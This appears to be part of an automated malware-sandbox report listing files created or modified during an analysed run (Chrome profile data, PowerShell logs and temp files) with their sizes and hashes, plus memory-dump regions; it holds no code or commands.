Filesize
2KB

MD5
a931f58666eb87d73c442a9f3c43b8fe

SHA1
ba3e51a4a506e0b1c5752405393a98e526515f07

SHA256
70eafde30c5f3fd9f9d467656e3a54c29f362d68ded02692206da9170232bff8

SHA512
cc978cdee688c6cd027af15498b1fbc88de58d70a4e9dcad981dad9527d6f8ef38969ba329fcf52d86cbe822fe69011027559603d6295870f7f827f270814bf0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
c6bf4cac8068b6d7754881f71ac420be

SHA1
61101920c6f46512ac55a044c0713c13341af3da

SHA256
1bb518200ec9669a59437f88fe44fa021d9cf5681e8d30c6b7c149d8dc6d9208

SHA512
d4b0af987cd1cdebd9cc5aa81c1ce6ec225758bc4fe47fa92793187beb05dba9a4f6bc3abc121c7746349cb646f2b4859944ff85ab5e6ec4071eeba8dbd56fd0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
69ad315e7e76195dd5a051961d8f307c

SHA1
5e4eb254060c24239e566329a0ae79fe34d76ab3

SHA256
d97db6610164cf0e930377098b9fbabd1a14f054be82a245d5a79913297af459

SHA512
4cdb954524ece3b0d6f8d0127d807eeddb74512eb7e5cfca7ddcc984066a01cb63554fd437835bb921e3c8f2361647c599f65c405c7a7be77b0b734f6f8157e6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
f1095997703543796bb4607284bdc304

SHA1
d8f04773ca6cd14bfbee70c16f0e54676bc78e4d

SHA256
07f758bf3fe89442f6b052451f8185d53d0ab0ec3fa567d888edde6412afa5ad

SHA512
c26ef9b339d7e81c8bf475eb7115666faab3fc6b5d8029806a6a0f63c9db2fb1a70d93ae52e26641b9f8a412c577903ff2e0053283e7cce1ed8f716bfe7ee6b5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
64e439422b958a387da55224efb520e9

SHA1
b2c5a0e5b3ffc9f5ede8c0d88404bdf28697124d

SHA256
fe13e523292cdadd65af7230091914cae6a3d3692c44d8b7269f617c252db70f

SHA512
be298a849821caf7dd150ca65e35ba432c6c0666d869fde701f685dd51f92e6a9e298d52fb848ef40d875f9438dc2a307eaf53e80b404b721597bda7574d97ea

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
636ea3f8b3e3e28057267402ccba4732

SHA1
255c9a6371867f7dc9b62226985823143565eace

SHA256
0c56933726ad7a0622e6f831583515eda2e15ae6200b1ca938fb7d35cac25ca5

SHA512
6baf80cca303e25af2a77f142d2b9b0d4b14bcd828197840ea180181aa352cb2ad0383dd03bd83244eec06f0543a54c888606c4c586095bf80a9dc74ec01c77e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
cd8c8835969091b268cc4aa0121ea555

SHA1
2c05457b20d13af2febda772e199a42ec882e018

SHA256
a4d58498c7f6224657b35af6cb06171ce27b324134a33fbe014b6433a192a3fb

SHA512
4e92203255aa806b65eea0810fcd45020b24a09989c310d980ac1f9404453e66524c038e3ccd192074751c59a13683d39a1115cc8558791478a668f41ef7cc4a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
0eeb1ace299eb9591d43bb2efe1d6b07

SHA1
bf6e4535592bccd22a68b97a14139210dfe00575

SHA256
7510029173549d1b0c5c600a771752c6a020239ea5a6d119704c1bc3721eb679

SHA512
b8daa8f4604778b6e3ab05ce2b0ef879ab9569e17cd2b02bf6b854778f1e97e742ec6adba019501c1f37583dc61aa21a423ca3531a65037dbe867cdbe2126536

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
6efd1532c6681b22d6b5258bc53b2703

SHA1
18a43735714df0175071c5214c7cb5cd4a3ba2c1

SHA256
e5a66b09a30e2262d64240aea5279af2e323b2471184f8aa022ca2e5aaa6849e

SHA512
98d935d0016acf8c4372264fbb1178e7e1bee0a1af0921d58cc856a6f96115abbffc35fcec9a4c252ebf5d19be7e66d6f7c3059afa075678dde02c780494e4f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
b479a23440285df637217c315425544b

SHA1
d22ea9850b6cadf78e75295563eae5d8937b6960

SHA256
9299daa9f5d73573b4e683fcdaea16ec694a32b0c743fc63146a19905644d121

SHA512
e863dd1ff8bb3a00c11846fa5dacc53972e6ab209a2bb9235d672c612ac9600a763c2611a67eddbb8cec4556265a86a9fb4de7e88378d4033c80f4256cc472b3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
380ecec1cb1317a9b2af209c9349ab8f

SHA1
b00d6469f6220844e6854a0891ec25b145e22b9d

SHA256
04a853ffd0227d8b90d97759a9ae42047cd7e0bf7695a77018347cd577e9c500

SHA512
939d476e15e00fda402921c4c9e18315e1ad19f9fafe74c9d5a10334ebaf2328495744e8d4d4e90cb71fc292d5b3c9310b2a05207ceaaecd4310844abb9693df

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
810761cf00f6c797bfa0437b6715ab46

SHA1
b94c24bc74515925a27f283e13446e96775f2eb9

SHA256
e977f6bfca9f2f6b09fa329bc8163d60c6a1d7fed018193e14ee754c780dda42

SHA512
85853960a3cb42373805495b765278c65b5484f9f4458302b1dbcf4adc7e6fdd4f8f07f090155038c87b6eb1f698eeedf3313b63cf12010bba71c3b3b65896d9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
12KB

MD5
9f74f36d1a04f25922fdcc732949bb47

SHA1
fc094047b23f2fca70e1487f39f4e01a72ba96c6

SHA256
fcf320c6cf75eac1babcb725cec20d031ba15b228feed821a37d9a0bdb1bac59

SHA512
902034a1bb2bc8b4f3a8046cb4165798dda5f1d64709c307c35984c052d1058c78c8b745a1e201cc274e5fba0de8fb9124f0a06053c3868ffccf6682200597cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
56B

MD5
ae1bccd6831ebfe5ad03b482ee266e4f

SHA1
01f4179f48f1af383b275d7ee338dd160b6f558a

SHA256
1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649

SHA512
baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5855cc.TMP

Filesize
120B

MD5
fd375d8adcbd786de061f4b19e0ffa7b

SHA1
c239fa0046742fb52c22ecbbf09aefa44fb8ca3d

SHA256
d61bd40be2315441525695d9e5563dfc9eb9a3de429d2c617eef01e22ce484fc

SHA512
a4fff8b911e600fcfbf6b095e22040f5bfb6f650e7a0f350d51a1ccbde47ccffb1e7c774abd1854218b76fea4a05ba47e6b54b2dbba1e63d0a41a6f1b3d3fe84

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
273KB

MD5
ed951c97c95bf88d2a90da417bf63814

SHA1
f212cd259062ff14822fd6468f08f24b7a9f04cc

SHA256
1a4998bb3f9999237ecb9641758f561e16013a894cec61db886defd8e3f75ac8

SHA512
c1d8386aeb852dbfb5e25f72f6d5dee776dfaf51bf7f9db925977eb45c4a10e61f1bb7f9ed2c233da293072f0b03e0e55a281cd3a9f34f5d545d2112ce624a5c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
273KB

MD5
52e85adf29eb3807e30d35e89280b850

SHA1
044b878d360bd582a39186a1e45f646c218d50fc

SHA256
2ecacf1bad8ba246ed6ec469a4298aeb98e0ec26c67a8eb8b19f581a1baafadb

SHA512
8014f41f4c0f0aceeae1e4dd834c4e3dae40aeca7000e8ce157fc110613b6dc3215fece0452e6e84c5a39cc122fd086ae754490bcca9bf6361c52e97eb86308a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
273KB

MD5
a03d96e9d27cf6c2ae76def110b07409

SHA1
569f01304a7641258d91413c8ae13a5d2e2b3a95

SHA256
f45eb45f837fa681f903ccdf9c4d4130396586eb351f1f50f776d9f44e79b7e2

SHA512
6d66e7308a34cbe01482373a705dcf7526ba2eeb9d5e48181fc683f127d74d573ce22c62ee583f03f13c1de7b6cdbfc44c21c9219521f240122ce6ed1b13b857

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
98KB

MD5
260fc45c953375cc89815352773c0f76

SHA1
79623b93ca48480b69bc79747c23f3365efb0e34

SHA256
c8d2b0263bf2ce02b7309a58cbd78d5733ab28d4c27b07d4e5086ddc6846a6e3

SHA512
87ad69a7c588fb7f03511e64a8041e58baecc9a8e3a0d0b3a3f05bdc9f626ff14ed8993242f82a2f8bed92d2ad620aaad912f1399182ffd52e18f9ad71be54b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe580673.TMP

Filesize
93KB

MD5
06d9f2c7a8e3e423413f6aba56e16cf0

SHA1
b9d0f8c4fae80628a1ff922c2f115b0436a5b822

SHA256
2147b473ec80eb3e11f9de15acb76a250fd667af02c45543b5b6a550b4708e70

SHA512
0a86b0e39b3f0299e702f54e002281a0780274447314e65989a3d185590477628377fada9dd495c4472910d48dd814fa52fbdabd17b8f11b5b2bd43fbcc55797

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
c6b0a774fa56e0169ed7bb7b25c114dd

SHA1
bcdba7d4ecfff2180510850e585b44691ea81ba5

SHA256
b87210c4a0814394371ec7fba00fc02d9adbb22bcb1811a2abab46fdf4325da9

SHA512
42295d57f735c31749235c8463ac2c31778bff46a6a16c87918440d0b2fc70d2f1f6fb10d2499105866f7022108bbda4268d2580356245bd19bbed1ee3a2c446

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a310696359b1c9e65945044bb71b3094

SHA1
e644000586949bf70e264bede0268cd0ef8b4507

SHA256
2e84eacf9fbdd61c0e33ddc9153c99365ed35b6407867b33637ba9ded1b417fa

SHA512
f3abdbc8de1f17fd69fac312a7081b238774864d7481ed64d3b1b96a478ee354c1729312eb5701b99644bb40014dc19615b9ef98ffb812be9168b6ab804d0202

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
aec6faa362dc8c8265aba31da4594304

SHA1
8a3356981f1509d3245093377e511b18aa5c5063

SHA256
578c2a3884f4bf3299a331c6f0b51a6388c6625b14aa96e427259483420038fa

SHA512
8c01c2e805ad220f8cec6b0ffb0c780e41ce1f4838d20aa39bb9ed25d540e915d1bce684eb2aa6afc91e78dcce94b01139c926369f9f7b88747c2f261a3ff741

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1bd77bfee946791e27e776990e3f6721

SHA1
434c8d3fff7ff225b658ea8ea4766df1b3698ed5

SHA256
b659a440a98ae4c8be7870e91d31785ec2e33dae0f5a0124ea3abd2701e5349c

SHA512
abcc11bf150ef79488b8455eaee35b152a30a307338bd241c8ab7ce4ba3fd4aacd99fc4b2c7a523a8cf542175f30da785ef515bc884358a716b55ee6fd9739c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
54c81712fb0e2348571b0842e11f5c1a

SHA1
77f197fdf206000d41d471be31bfe8bed18f259a

SHA256
5f234794e1cf3273c5a64189fd5d34dd9a5a37ad4946589942af74d1cad87740

SHA512
1d9faddf06b517325b6fe2c24823b0452f02d5759d74176c7cbc17c993bd791efc95eac9c02b573dc43507dfd269473de151f3049ffbc49162a6f7b591043fd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_csasaz1m.40j.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/2872-24-0x00007FFC02D80000-0x00007FFC0376C000-memory.dmp

Filesize
9.9MB

Download
memory/2872-23-0x0000020AD0E70000-0x0000020AD0E80000-memory.dmp

Filesize
64KB

Download
memory/2872-9-0x0000020AD1100000-0x0000020AD1176000-memory.dmp

Filesize
472KB

Download
memory/2872-4-0x0000020AB8A10000-0x0000020AB8A32000-memory.dmp

Filesize
136KB

Download
memory/2872-7-0x0000020AD0E70000-0x0000020AD0E80000-memory.dmp

Filesize
64KB

Download
memory/2872-5-0x00007FFC02D80000-0x00007FFC0376C000-memory.dmp

Filesize
9.9MB

Download
memory/5104-1253-0x0000022FB0470000-0x0000022FB05A8000-memory.dmp

Filesize
1.2MB

Download